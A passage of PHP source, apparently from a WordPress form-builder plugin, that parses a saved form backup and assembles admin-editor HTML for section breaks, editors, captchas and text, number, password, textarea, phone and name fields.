      $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker_backup WHERE backup_id="%d"', $id));
      $labels2 = array();
      $label_id = array();
      $label_order_original = array(); 
      $label_type = array();
      $label_all = explode('#****#', $row->label_order);
      $label_all = array_slice($label_all, 0, count($label_all) - 1);
  		foreach($label_all as $key => $label_each) {
        $label_id_each=explode('#**id**#',$label_each);
        array_push($label_id, $label_id_each[0]);
        $label_oder_each=explode('#**label**#', $label_id_each[1]);
        array_push($label_order_original, addslashes($label_oder_each[0]));
        array_push($label_type, $label_oder_each[1]);
  		}
      $labels2['id'] = '"' . implode('","', $label_id) . '"';
      $labels2['label'] = '"' . implode('","', $label_order_original) . '"';
      $labels2['type'] = '"' . implode('","', $label_type) . '"';
      $ids = array();
      $types = array();
      $labels = array();
      $paramss = array();
      $fields = explode('*:*new_field*:*', $row->form_fields);
      $fields = array_slice($fields, 0, count($fields) - 1);   
      foreach ($fields as $field) {
        $temp=explode('*:*id*:*',$field);
        array_push($ids, $temp[0]);
        $temp=explode('*:*type*:*',$temp[1]);
        array_push($types, $temp[0]);
        $temp=explode('*:*w_field_label*:*',$temp[1]);
        array_push($labels, $temp[0]);
        array_push($paramss, $temp[1]);
      }
      $form = $row->form_front;
      foreach ($ids as $ids_key => $id) {
        $label = $labels[$ids_key];
        $type = $types[$ids_key];
        $params = $paramss[$ids_key];
        if (strpos($form, '%'.$id.' - '.$label.'%') || strpos($form, '%'.$id.' -'.$label.'%')) {
          $rep = '';
          $arrows='';
          $param = array();
          $param['attributes'] = '';
          switch($type)
          {
            case 'type_section_break':
            {
              $arrows =$arrows.'<div id="wdform_arrows'.$id.'" class="wdform_arrows" ><div id="X_'.$id.'" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/delete_el.png?ver='. get_option("wd_form_maker_version").'" title="Remove the field" onclick="remove_section_break(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)"></div><div id="edit_'.$id.'" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/edit.png?ver='. get_option("wd_form_maker_version").'" title="Edit the field" onclick="edit(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)"><span id="'.$id.'_element_labelform_id_temp" style="display: none;">custom_'.$id.'</span></div><div id="duplicate_'.$id.'" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/duplicate.png?ver='. get_option("wd_form_maker_version").'" title="Duplicate the field" onclick="duplicate(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;duplicate&quot;)" onmouseout="chnage_icons_src(this,&quot;duplicate&quot;)"></div></div>';
              break;
            }
            case 'type_editor':
            {
              $arrows =$arrows.'<div id="wdform_arrows'.$id.'" class="wdform_arrows" type="type_editor" style="margin-top:0px;"><div id="X_'.$id.'" valign="middle" align="right" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/delete_el.png?ver='. get_option("wd_form_maker_version").'" title="Remove the field" onclick="remove_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)"></div><div id="left_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/left.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the left" onclick="left_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)"></div><div id="up_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/up.png?ver='. get_option("wd_form_maker_version").'" title="Move the field up" onclick="up_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)"></div><div id="down_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/down.png?ver='. get_option("wd_form_maker_version").'" title="Move the field down" onclick="down_row(&quot;'.$id.'&quot;)"  onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)"></div><div id="right_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/right.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the right" onclick="right_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)"></div><div id="edit_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/edit.png?ver='. get_option("wd_form_maker_version").'" title="Edit the field" onclick="edit(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)"></div><div id="duplicate_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/duplicate.png?ver='. get_option("wd_form_maker_version").'" title="Duplicate the field" onclick="duplicate(&quot;'.$id.'&quot;)"  onmouseover="chnage_icons_src(this,&quot;duplicate&quot;)" onmouseout="chnage_icons_src(this,&quot;duplicate&quot;)"></div><div id="page_up_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/page_up.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the upper page" onclick="page_up(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)"></div><div id="page_down_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/page_down.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the lower page" onclick="page_down(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)"></div></div>';
              break;
            }
            
            case 'type_send_copy':
            case 'type_captcha':
			case 'type_arithmetic_captcha':
            case 'type_recaptcha':
            {
              $arrows =$arrows.'<div id="wdform_arrows'.$id.'" class="wdform_arrows"><div id="X_'.$id.'" valign="middle" align="right" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/delete_el.png?ver='. get_option("wd_form_maker_version").'" title="Remove the field" onclick="remove_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)"></div><div id="left_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/left.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the left" onclick="left_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)"></div><div id="up_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/up.png?ver='. get_option("wd_form_maker_version").'" title="Move the field up" onclick="up_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)"></div><div id="down_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/down.png?ver='. get_option("wd_form_maker_version").'" title="Move the field down" onclick="down_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)"></div><div id="right_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/right.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the right" onclick="right_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)"></div><div id="edit_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/edit.png?ver='. get_option("wd_form_maker_version").'" title="Edit the field" onclick="edit(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)"></div><div id="duplicate_'.$id.'" valign="middle" class="element_toolbar"></div><div id="page_up_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/page_up.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the upper page" onclick="page_up(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)"></div><div id="page_down_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/page_down.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the lower page" onclick="page_down(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)"></div></div>';
              break;
            }
            
            default :
            {
              $arrows =$arrows.'<div id="wdform_arrows'.$id.'" class="wdform_arrows" ><div id="X_'.$id.'" valign="middle" align="right" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/delete_el.png?ver='. get_option("wd_form_maker_version").'" title="Remove the field" onclick="remove_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)"></div><div id="left_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/left.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the left" onclick="left_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)"></div><div id="up_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/up.png?ver='. get_option("wd_form_maker_version").'" title="Move the field up" onclick="up_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)"></div><div id="down_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/down.png?ver='. get_option("wd_form_maker_version").'" title="Move the field down" onclick="down_row(&quot;'.$id.'&quot;)"  onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)"></div><div id="right_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/right.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the right" onclick="right_row(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)"></div><div id="edit_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/edit.png?ver='. get_option("wd_form_maker_version").'" title="Edit the field" onclick="edit(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)"></div><div id="duplicate_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/duplicate.png?ver='. get_option("wd_form_maker_version").'" title="Duplicate the field" onclick="duplicate(&quot;'.$id.'&quot;)"  onmouseover="chnage_icons_src(this,&quot;duplicate&quot;)" onmouseout="chnage_icons_src(this,&quot;duplicate&quot;)"></div><div id="page_up_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/page_up.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the upper page" onclick="page_up(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)"></div><div id="page_down_'.$id.'" valign="middle" class="element_toolbar"><img src="' . WD_FMC_URL . '/images/page_down.png?ver='. get_option("wd_form_maker_version").'" title="Move the field to the lower page" onclick="page_down(&quot;'.$id.'&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)"></div></div>';
              break;
            }
            
          }
          switch ($type) {
            case 'type_section_break': {
              $params_names = array('w_editor');
              $temp = $params;
              foreach ($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              $rep ='<div id="wdform_field'.$id.'" type="type_section_break" class="wdform_field_section_break">'.$arrows.'<span id="'.$id.'_element_labelform_id_temp" style="display: none;">custom_'.$id.'</span><div id="'.$id.'_element_sectionform_id_temp" align="left" class="wdform_section_break">'.$param['w_editor'].'</div></div><div id="'.$id.'_element_labelform_id_temp" style="color:red;">custom_'.$id.'</div>';
              break;
            }
            case 'type_editor': {
              $params_names = array('w_editor');
              $temp = $params;
              foreach ($params_names as $params_name ) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              $rep =$arrows.'<div id="wdform_field'.$id.'" type="type_editor" class="wdform_field" >'.$param['w_editor'].'</div><div id="'.$id.'_element_labelform_id_temp" style="color: red;">custom_'.$id.'</div>';
              break;
            }
            case 'type_send_copy': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_first_val', 'w_required');
              $temp = $params;
              foreach ($params_names as $params_name ) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {	
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");	
              $input_active = ($param['w_first_val'] == 'true' ? "checked='checked'" : "");
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");
              $rep ='<div id="wdform_field'.$id.'" type="type_send_copy" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" style="display: '.$param['w_field_label_pos'].'"><input type="hidden" value="type_send_copy" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp" /><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp" /><input type="checkbox" id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" onclick="set_checked(&quot;'.$id.'&quot;,&quot;&quot;,&quot;form_id_temp&quot;)" '.$input_active.' '.$param['attributes'].' disabled /></div></div>';
              break;
            }
            case 'type_text': {
				$params_names = array('w_field_label_size', 'w_field_label_pos', 'w_size', 'w_first_val', 'w_title', 'w_required', 'w_unique');
				$temp = $params;
				if(strpos($temp, 'w_regExp_status') > -1)
					$params_names = array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required', 'w_regExp_status', 'w_regExp_value', 'w_regExp_common', 'w_regExp_arg', 'w_regExp_alert', 'w_unique');
				foreach ($params_names as $params_name) {
					$temp = explode('*:*' . $params_name . '*:*', $temp);
					$param[$params_name] = $temp[0];
					$temp = $temp[1];
				}
				if ($temp) {
					$temp	= explode('*:*w_attr_name*:*', $temp);
					$attrs = array_slice($temp, 0, count($temp) - 1);
					foreach ($attrs as $attr) {
					  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
					}
				}
				
				$param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");
				$input_active = ($param['w_first_val'] == $param['w_title'] ? "input_deactive" : "input_active");
				$required_sym = ($param['w_required'] == "yes" ? " *" : "");
				
				$param['w_regExp_status'] = (isset($param['w_regExp_status']) ? $param['w_regExp_status'] : "no");
				$param['w_regExp_value'] = (isset($param['w_regExp_value']) ? $param['w_regExp_value'] : "");
				$param['w_regExp_common'] = (isset($param['w_regExp_common']) ? $param['w_regExp_common'] : "");
				$param['w_regExp_arg'] = (isset($param['w_regExp_arg']) ? $param['w_regExp_arg'] : "");
				$param['w_regExp_alert'] = (isset($param['w_regExp_alert']) ? $param['w_regExp_alert'] : "Incorrect Value");
				
				$rep ='<div id="wdform_field'.$id.'" type="type_text" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" style="display: '.$param['w_field_label_pos'].'"><input type="hidden" value="type_text" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp" /><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp" /><input type="hidden" value="'.$param['w_regExp_status'].'" name="'.$id.'_regExpStatusform_id_temp" id="'.$id.'_regExpStatusform_id_temp"><input type="hidden" value="'.$param['w_regExp_value'].'" name="'.$id.'_regExp_valueform_id_temp" id="'.$id.'_regExp_valueform_id_temp"><input type="hidden" value="'.$param['w_regExp_common'].'" name="'.$id.'_regExp_commonform_id_temp" id="'.$id.'_regExp_commonform_id_temp"><input type="hidden" value="'.$param['w_regExp_alert'].'" name="'.$id.'_regExp_alertform_id_temp" id="'.$id.'_regExp_alertform_id_temp"><input type="hidden" value="'.$param['w_regExp_arg'].'" name="'.$id.'_regArgumentform_id_temp" id="'.$id.'_regArgumentform_id_temp"><input type="hidden" value="'.$param['w_unique'].'" name="'.$id.'_uniqueform_id_temp" id="'.$id.'_uniqueform_id_temp" /><input type="text" class="'.$input_active.'" id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" value="'.$param['w_first_val'].'" title="'.$param['w_title'].'" onfocus="delete_value(&quot;'.$id.'_elementform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_elementform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_elementform_id_temp&quot;)" style="width: '.$param['w_size'].'px;" '.$param['attributes'].' disabled /></div></div>';
				
				break;
            }
           case 'type_number': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_size', 'w_first_val', 'w_title', 'w_required', 'w_unique', 'w_class');
              $temp = $params;
              foreach ($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);   
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");
              $input_active = ($param['w_first_val'] == $param['w_title'] ? "input_deactive" : "input_active");
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");
              $rep ='<div id="wdform_field'.$id.'" type="type_number" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp"  class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'"><input type="hidden" value="type_number" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_unique'].'" name="'.$id.'_uniqueform_id_temp" id="'.$id.'_uniqueform_id_temp"><input type="text" class="'.$input_active.'" id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" value="'.$param['w_first_val'].'" title="'.$param['w_title'].'" onkeypress="return check_isnum(event)" onfocus="delete_value(&quot;'.$id.'_elementform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_elementform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_elementform_id_temp&quot;)" style="width: '.$param['w_size'].'px;" '.$param['attributes'].' disabled /></div></div>';
              break;
            }
            case 'type_password': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_size', 'w_required', 'w_unique', 'w_class');
              $temp = $params;
              foreach ($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);   
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");	
              $rep ='<div id="wdform_field'.$id.'" type="type_password" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp"  class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'"><input type="hidden" value="type_password" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_unique'].'" name="'.$id.'_uniqueform_id_temp" id="'.$id.'_uniqueform_id_temp"><input type="password" id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" style="width: '.$param['w_size'].'px;" '.$param['attributes'].' disabled /></div></div>';
              break;
            }
            case 'type_textarea': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_size_w', 'w_size_h', 'w_first_val', 'w_title', 'w_required', 'w_unique', 'w_class');
              $temp = $params;
              foreach ($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");
              $input_active = ($param['w_first_val'] == $param['w_title'] ? "input_deactive" : "input_active");
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");
              $rep ='<div id="wdform_field'.$id.'" type="type_textarea" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display:'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: table-cell;"><input type="hidden" value="type_textarea" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_unique'].'" name="'.$id.'_uniqueform_id_temp" id="'.$id.'_uniqueform_id_temp"><textarea class="'.$input_active.'" id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" title="'.$param['w_title'].'"  onfocus="delete_value(&quot;'.$id.'_elementform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_elementform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_elementform_id_temp&quot;)" style="width: '.$param['w_size_w'].'px; height: '.$param['w_size_h'].'px;" '.$param['attributes'].' disabled>'.$param['w_first_val'].'</textarea></div></div>';
              break;
            }
            case 'type_phone': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_size', 'w_first_val', 'w_title', 'w_mini_labels', 'w_required', 'w_unique', 'w_class');
              $temp = $params;
              foreach ($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $w_first_val = explode('***', $param['w_first_val']);
              $w_title = explode('***', $param['w_title']);
              $w_mini_labels = explode('***', $param['w_mini_labels']);
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");
              $input_active = ($param['w_first_val'] == $param['w_title'] ? "input_deactive" : "input_active");
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");
              $rep ='<div id="wdform_field'.$id.'" type="type_phone" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_phone" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_unique'].'" name="'.$id.'_uniqueform_id_temp" id="'.$id.'_uniqueform_id_temp"><div id="'.$id.'_table_name" style="display: table;"><div id="'.$id.'_tr_name1" style="display: table-row;"><div id="'.$id.'_td_name_input_first" style="display: table-cell;"><input type="text" class="'.$input_active.'" id="'.$id.'_element_firstform_id_temp" name="'.$id.'_element_firstform_id_temp" value="'.$w_first_val[0].'" title="'.$w_title[0].'" onfocus="delete_value(&quot;'.$id.'_element_firstform_id_temp&quot;)"onblur="return_value(&quot;'.$id.'_element_firstform_id_temp&quot;)"onchange="change_value(&quot;'.$id.'_element_firstform_id_temp&quot;)" onkeypress="return check_isnum(event)"style="width: 50px;" '.$param['attributes'].' disabled /><span class="wdform_line" style="margin: 0px 4px; padding: 0px;">-</span></div><div id="'.$id.'_td_name_input_last" style="display: table-cell;"><input type="text" class="'.$input_active.'" id="'.$id.'_element_lastform_id_temp" name="'.$id.'_element_lastform_id_temp" value="'.$w_first_val[1].'" title="'.$w_title[1].'" onfocus="delete_value(&quot;'.$id.'_element_lastform_id_temp&quot;)"onblur="return_value(&quot;'.$id.'_element_lastform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_element_lastform_id_temp&quot;)" onkeypress="return check_isnum(event)"style="width: '.$param['w_size'].'px;" '.$param['attributes'].' disabled /></div></div><div id="'.$id.'_tr_name2" style="display: table-row;"><div id="'.$id.'_td_name_label_first" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_area_code">'.$w_mini_labels[0].'</label></div><div id="'.$id.'_td_name_label_last" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_phone_number">'.$w_mini_labels[1].'</label></div></div></div></div></div>';
              break;
            }
            case 'type_name': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_first_val', 'w_title', 'w_mini_labels', 'w_size', 'w_name_format', 'w_required', 'w_unique', 'w_class');
              $temp = $params;
			  if(strpos($temp, 'w_name_fields') > -1)
				$params_names = array('w_field_label_size', 'w_field_label_pos', 'w_first_val', 'w_title', 'w_mini_labels', 'w_size', 'w_name_format', 'w_required', 'w_unique', 'w_class', 'w_name_fields');
              foreach ($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");
              $w_first_val = explode('***', $param['w_first_val']);
              $w_title = explode('***', $param['w_title']);
              $w_mini_labels = explode('***', $param['w_mini_labels']);
			  
			  $param['w_name_fields'] =  isset($param['w_name_fields']) ? $param['w_name_fields'] : ($param['w_name_format'] == 'normal' ? 'no***no' : 'yes***yes');
			  $w_name_fields = explode('***', $param['w_name_fields']);

